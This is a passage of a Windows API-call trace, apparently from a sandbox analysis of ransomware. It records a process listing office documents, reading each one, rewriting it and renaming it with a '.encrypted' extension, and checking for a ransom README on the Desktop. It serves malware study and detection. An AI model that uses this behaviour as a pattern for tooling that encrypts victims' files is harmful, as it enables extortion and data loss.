cFileName="6wd_KO_eVh.xlsx", cAlternateFileName="6WD_KO~1.XLS")) returned 1 [0152.805] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79402150, ftCreationTime.dwHighDateTime=0x1d5e509, ftLastAccessTime.dwLowDateTime=0x10044110, ftLastAccessTime.dwHighDateTime=0x1d5df11, ftLastWriteTime.dwLowDateTime=0x10044110, ftLastWriteTime.dwHighDateTime=0x1d5df11, nFileSizeHigh=0x0, nFileSizeLow=0xf6de, dwReserved0=0x0, dwReserved1=0x0, cFileName="EJPgglYGV7ETM.odt", cAlternateFileName="EJPGGL~1.ODT")) returned 1 [0152.805] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf837e40, ftCreationTime.dwHighDateTime=0x1d5dc37, ftLastAccessTime.dwLowDateTime=0x298e7610, ftLastAccessTime.dwHighDateTime=0x1d5e02d, ftLastWriteTime.dwLowDateTime=0x298e7610, ftLastWriteTime.dwHighDateTime=0x1d5e02d, nFileSizeHigh=0x0, nFileSizeLow=0x1fb7, dwReserved0=0x0, dwReserved1=0x0, cFileName="HVbg15qz0rsOcBGpiJX.docx", cAlternateFileName="HVBG15~1.DOC")) returned 1 [0152.805] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0117ef0, ftCreationTime.dwHighDateTime=0x1d5e059, ftLastAccessTime.dwLowDateTime=0xbfd1d990, ftLastAccessTime.dwHighDateTime=0x1d5dfc5, ftLastWriteTime.dwLowDateTime=0xbfd1d990, ftLastWriteTime.dwHighDateTime=0x1d5dfc5, nFileSizeHigh=0x0, nFileSizeLow=0xddc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="i_xGwCQrE1RZ-4P1WI.pdf", cAlternateFileName="I_XGWC~1.PDF")) returned 1 [0152.806] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ade00, ftCreationTime.dwHighDateTime=0x1d5d7ac, ftLastAccessTime.dwLowDateTime=0xa1e30870, ftLastAccessTime.dwHighDateTime=0x1d5e2bb, ftLastWriteTime.dwLowDateTime=0xa1e30870, ftLastWriteTime.dwHighDateTime=0x1d5e2bb, nFileSizeHigh=0x0, nFileSizeLow=0x18317, dwReserved0=0x0, dwReserved1=0x0, cFileName="m6W H-B k11.ppt", cAlternateFileName="M6WH-B~1.PPT")) returned 1 [0152.806] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x925adc10, ftCreationTime.dwHighDateTime=0x1d5e28a, ftLastAccessTime.dwLowDateTime=0x6da0aad0, ftLastAccessTime.dwHighDateTime=0x1d5e1f9, ftLastWriteTime.dwLowDateTime=0x6da0aad0, ftLastWriteTime.dwHighDateTime=0x1d5e1f9, nFileSizeHigh=0x0, nFileSizeLow=0xec36, dwReserved0=0x0, dwReserved1=0x0, cFileName="mqkOK7WooFaX.ots", cAlternateFileName="MQKOK7~1.OTS")) returned 1 [0152.806] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4416a80, ftCreationTime.dwHighDateTime=0x1d5d8d4, ftLastAccessTime.dwLowDateTime=0x3758e230, ftLastAccessTime.dwHighDateTime=0x1d5df74, ftLastWriteTime.dwLowDateTime=0x3758e230, ftLastWriteTime.dwHighDateTime=0x1d5df74, nFileSizeHigh=0x0, nFileSizeLow=0x2a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="nvogx9 zOdj7mV0Fno5q.odt", cAlternateFileName="NVOGX9~1.ODT")) returned 1 [0152.806] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf38047d0, ftCreationTime.dwHighDateTime=0x1d5df17, ftLastAccessTime.dwLowDateTime=0xc70ca3f0, ftLastAccessTime.dwHighDateTime=0x1d5e2b5, ftLastWriteTime.dwLowDateTime=0xc70ca3f0, ftLastWriteTime.dwHighDateTime=0x1d5e2b5, nFileSizeHigh=0x0, nFileSizeLow=0x18ecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="vI5yibCVFS506wd9DN.doc", cAlternateFileName="VI5YIB~1.DOC")) returned 1 [0152.806] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43833630, ftCreationTime.dwHighDateTime=0x1d5e219, ftLastAccessTime.dwLowDateTime=0x13cf22c0, ftLastAccessTime.dwHighDateTime=0x1d5df74, ftLastWriteTime.dwLowDateTime=0x13cf22c0, ftLastWriteTime.dwHighDateTime=0x1d5df74, nFileSizeHigh=0x0, nFileSizeLow=0x15c76, dwReserved0=0x0, dwReserved1=0x0, cFileName="w1N Rq.pptx", cAlternateFileName="W1NRQ~1.PPT")) returned 1 [0152.806] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c1bd8d0, ftCreationTime.dwHighDateTime=0x1d5e3a3, ftLastAccessTime.dwLowDateTime=0x1746b190, ftLastAccessTime.dwHighDateTime=0x1d5dce8, ftLastWriteTime.dwLowDateTime=0x1746b190, ftLastWriteTime.dwHighDateTime=0x1d5dce8, nFileSizeHigh=0x0, nFileSizeLow=0x146a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="xfg7OcMuV.docx", cAlternateFileName="XFG7OC~1.DOC")) returned 1 [0152.806] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5dc7a20, ftCreationTime.dwHighDateTime=0x1d5d807, ftLastAccessTime.dwLowDateTime=0x8d4ee710, ftLastAccessTime.dwHighDateTime=0x1d5e2a4, ftLastWriteTime.dwLowDateTime=0x8d4ee710, ftLastWriteTime.dwHighDateTime=0x1d5e2a4, nFileSizeHigh=0x0, nFileSizeLow=0xf87, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y79LK5.doc", cAlternateFileName="")) returned 1 [0152.806] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0152.807] FindClose (in: hFindFile=0x94e88f0 | out: hFindFile=0x94e88f0) returned 1 [0152.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0152.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0152.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0152.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT", lpFilePart=0x0) returned 0x3a [0152.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\", lpFilePart=0x0) returned 0x3b [0152.810] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc9239a0, ftCreationTime.dwHighDateTime=0x1d5e668, ftLastAccessTime.dwLowDateTime=0x58812d0, ftLastAccessTime.dwHighDateTime=0x1d5e69f, ftLastWriteTime.dwLowDateTime=0x58812d0, ftLastWriteTime.dwHighDateTime=0x1d5e69f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94e88f0 [0152.811] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc9239a0, ftCreationTime.dwHighDateTime=0x1d5e668, ftLastAccessTime.dwLowDateTime=0x58812d0, ftLastAccessTime.dwHighDateTime=0x1d5e69f, ftLastWriteTime.dwLowDateTime=0x58812d0, ftLastWriteTime.dwHighDateTime=0x1d5e69f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.811] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67e4570, ftCreationTime.dwHighDateTime=0x1d5e756, ftLastAccessTime.dwLowDateTime=0x4dd1e620, ftLastAccessTime.dwHighDateTime=0x1d5e32e, ftLastWriteTime.dwLowDateTime=0x4dd1e620, ftLastWriteTime.dwHighDateTime=0x1d5e32e, nFileSizeHigh=0x0, nFileSizeLow=0xb702, dwReserved0=0x0, dwReserved1=0x0, cFileName="3UL9aHsN4B.pptx", cAlternateFileName="3UL9AH~1.PPT")) returned 1 [0152.811] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ab13c30, ftCreationTime.dwHighDateTime=0x1d5da90, ftLastAccessTime.dwLowDateTime=0x4305ce40, ftLastAccessTime.dwHighDateTime=0x1d5da15, ftLastWriteTime.dwLowDateTime=0x4305ce40, ftLastWriteTime.dwHighDateTime=0x1d5da15, nFileSizeHigh=0x0, nFileSizeLow=0x14e73, dwReserved0=0x0, dwReserved1=0x0, cFileName="439h_isYEVctUB zXEr.ods", cAlternateFileName="439H_I~1.ODS")) returned 1 [0152.812] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b7893a0, ftCreationTime.dwHighDateTime=0x1d5e30a, ftLastAccessTime.dwLowDateTime=0x83facaa0, ftLastAccessTime.dwHighDateTime=0x1d5e059, ftLastWriteTime.dwLowDateTime=0x83facaa0, ftLastWriteTime.dwHighDateTime=0x1d5e059, nFileSizeHigh=0x0, nFileSizeLow=0x13cf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="6wd_KO_eVh.xlsx", cAlternateFileName="6WD_KO~1.XLS")) returned 1 [0152.812] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79402150, ftCreationTime.dwHighDateTime=0x1d5e509, ftLastAccessTime.dwLowDateTime=0x10044110, ftLastAccessTime.dwHighDateTime=0x1d5df11, ftLastWriteTime.dwLowDateTime=0x10044110, ftLastWriteTime.dwHighDateTime=0x1d5df11, nFileSizeHigh=0x0, nFileSizeLow=0xf6de, dwReserved0=0x0, dwReserved1=0x0, cFileName="EJPgglYGV7ETM.odt", cAlternateFileName="EJPGGL~1.ODT")) returned 1 [0152.812] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf837e40, ftCreationTime.dwHighDateTime=0x1d5dc37, ftLastAccessTime.dwLowDateTime=0x298e7610, ftLastAccessTime.dwHighDateTime=0x1d5e02d, ftLastWriteTime.dwLowDateTime=0x298e7610, ftLastWriteTime.dwHighDateTime=0x1d5e02d, nFileSizeHigh=0x0, nFileSizeLow=0x1fb7, dwReserved0=0x0, dwReserved1=0x0, cFileName="HVbg15qz0rsOcBGpiJX.docx", cAlternateFileName="HVBG15~1.DOC")) returned 1 [0152.812] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0117ef0, ftCreationTime.dwHighDateTime=0x1d5e059, ftLastAccessTime.dwLowDateTime=0xbfd1d990, ftLastAccessTime.dwHighDateTime=0x1d5dfc5, ftLastWriteTime.dwLowDateTime=0xbfd1d990, ftLastWriteTime.dwHighDateTime=0x1d5dfc5, nFileSizeHigh=0x0, nFileSizeLow=0xddc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="i_xGwCQrE1RZ-4P1WI.pdf", cAlternateFileName="I_XGWC~1.PDF")) returned 1 [0152.812] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ade00, ftCreationTime.dwHighDateTime=0x1d5d7ac, ftLastAccessTime.dwLowDateTime=0xa1e30870, ftLastAccessTime.dwHighDateTime=0x1d5e2bb, ftLastWriteTime.dwLowDateTime=0xa1e30870, ftLastWriteTime.dwHighDateTime=0x1d5e2bb, nFileSizeHigh=0x0, nFileSizeLow=0x18317, dwReserved0=0x0, dwReserved1=0x0, cFileName="m6W H-B k11.ppt", cAlternateFileName="M6WH-B~1.PPT")) returned 1 [0152.812] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x925adc10, ftCreationTime.dwHighDateTime=0x1d5e28a, ftLastAccessTime.dwLowDateTime=0x6da0aad0, ftLastAccessTime.dwHighDateTime=0x1d5e1f9, ftLastWriteTime.dwLowDateTime=0x6da0aad0, ftLastWriteTime.dwHighDateTime=0x1d5e1f9, nFileSizeHigh=0x0, nFileSizeLow=0xec36, dwReserved0=0x0, dwReserved1=0x0, cFileName="mqkOK7WooFaX.ots", cAlternateFileName="MQKOK7~1.OTS")) returned 1 [0152.812] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4416a80, ftCreationTime.dwHighDateTime=0x1d5d8d4, ftLastAccessTime.dwLowDateTime=0x3758e230, ftLastAccessTime.dwHighDateTime=0x1d5df74, ftLastWriteTime.dwLowDateTime=0x3758e230, ftLastWriteTime.dwHighDateTime=0x1d5df74, nFileSizeHigh=0x0, nFileSizeLow=0x2a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="nvogx9 zOdj7mV0Fno5q.odt", cAlternateFileName="NVOGX9~1.ODT")) returned 1 [0152.813] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf38047d0, ftCreationTime.dwHighDateTime=0x1d5df17, ftLastAccessTime.dwLowDateTime=0xc70ca3f0, ftLastAccessTime.dwHighDateTime=0x1d5e2b5, ftLastWriteTime.dwLowDateTime=0xc70ca3f0, ftLastWriteTime.dwHighDateTime=0x1d5e2b5, nFileSizeHigh=0x0, nFileSizeLow=0x18ecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="vI5yibCVFS506wd9DN.doc", cAlternateFileName="VI5YIB~1.DOC")) returned 1 [0152.813] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43833630, ftCreationTime.dwHighDateTime=0x1d5e219, ftLastAccessTime.dwLowDateTime=0x13cf22c0, ftLastAccessTime.dwHighDateTime=0x1d5df74, ftLastWriteTime.dwLowDateTime=0x13cf22c0, ftLastWriteTime.dwHighDateTime=0x1d5df74, nFileSizeHigh=0x0, nFileSizeLow=0x15c76, dwReserved0=0x0, dwReserved1=0x0, cFileName="w1N Rq.pptx", cAlternateFileName="W1NRQ~1.PPT")) returned 1 [0152.813] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c1bd8d0, ftCreationTime.dwHighDateTime=0x1d5e3a3, ftLastAccessTime.dwLowDateTime=0x1746b190, ftLastAccessTime.dwHighDateTime=0x1d5dce8, ftLastWriteTime.dwLowDateTime=0x1746b190, ftLastWriteTime.dwHighDateTime=0x1d5dce8, nFileSizeHigh=0x0, nFileSizeLow=0x146a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="xfg7OcMuV.docx", cAlternateFileName="XFG7OC~1.DOC")) returned 1 [0152.813] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5dc7a20, ftCreationTime.dwHighDateTime=0x1d5d807, ftLastAccessTime.dwLowDateTime=0x8d4ee710, ftLastAccessTime.dwHighDateTime=0x1d5e2a4, ftLastWriteTime.dwLowDateTime=0x8d4ee710, ftLastWriteTime.dwHighDateTime=0x1d5e2a4, nFileSizeHigh=0x0, nFileSizeLow=0xf87, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y79LK5.doc", cAlternateFileName="")) returned 1 [0152.813] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5dc7a20, ftCreationTime.dwHighDateTime=0x1d5d807, ftLastAccessTime.dwLowDateTime=0x8d4ee710, ftLastAccessTime.dwHighDateTime=0x1d5e2a4, ftLastWriteTime.dwLowDateTime=0x8d4ee710, ftLastWriteTime.dwHighDateTime=0x1d5e2a4, nFileSizeHigh=0x0, nFileSizeLow=0xf87, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y79LK5.doc", cAlternateFileName="")) returned 0 [0152.813] FindClose (in: hFindFile=0x94e88f0 | out: hFindFile=0x94e88f0) returned 1 [0152.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0152.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0152.814] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx", lpFilePart=0x0) returned 0x4a [0152.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0152.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\3ul9ahsn4b.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.818] GetFileType (hFile=0x4d0) returned 0x1 [0152.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0152.818] GetFileType (hFile=0x4d0) returned 0x1 [0152.818] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0xb702 [0152.818] ReadFile (in: hFile=0x4d0, lpBuffer=0x22e5770, nNumberOfBytesToRead=0xb702, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x22e5770*, lpNumberOfBytesRead=0x2ee854*=0xb702, lpOverlapped=0x0) returned 1 [0152.834] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0152.834] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0152.834] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx", nBufferLength=0x105, lpBuffer=0x2ee294, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx", lpFilePart=0x0) returned 0x4a [0152.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee788) returned 1 [0152.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\3ul9ahsn4b.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.836] GetFileType (hFile=0x4d0) returned 0x1 [0152.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee784) returned 1 [0152.836] GetFileType (hFile=0x4d0) returned 0x1 [0152.836] WriteFile (in: hFile=0x4d0, lpBuffer=0x2354a64*, nNumberOfBytesToWrite=0xb710, lpNumberOfBytesWritten=0x2ee844, lpOverlapped=0x0 | out: lpBuffer=0x2354a64*, lpNumberOfBytesWritten=0x2ee844*=0xb710, lpOverlapped=0x0) returned 1 [0152.837] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx", lpFilePart=0x0) returned 0x4a [0152.837] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee3cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx.encrypted", lpFilePart=0x0) returned 0x54 [0152.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee82c) returned 1 [0152.837] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\3ul9ahsn4b.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8a8 | out: lpFileInformation=0x2ee8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67e4570, ftCreationTime.dwHighDateTime=0x1d5e756, ftLastAccessTime.dwLowDateTime=0x4dd1e620, ftLastAccessTime.dwHighDateTime=0x1d5e32e, ftLastWriteTime.dwLowDateTime=0x420fa220, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xb710)) returned 1 [0152.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee828) returned 1 [0152.837] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\3ul9ahsn4b.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\3UL9aHsN4B.pptx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\3ul9ahsn4b.pptx.encrypted")) returned 1 [0152.839] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx", lpFilePart=0x0) returned 0x4a [0152.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0152.839] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ddkkzebb5hx30vx7ft\\6wd_ko_evh.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.839] GetFileType (hFile=0x4d0) returned 0x1 [0152.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0152.839] GetFileType (hFile=0x4d0) returned 0x1 [0152.839] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0x13cf7 [0152.839] ReadFile (in: hFile=0x4d0, lpBuffer=0x236074c, nNumberOfBytesToRead=0x13cf7, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x236074c*, lpNumberOfBytesRead=0x2ee854*=0x13cf7, lpOverlapped=0x0) returned 1 [0152.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee820) returned 1 [0152.857] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee89c | out: lpFileInformation=0x2ee89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee81c) returned 1 [0152.857] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\6wd_KO_eVh.xlsx", 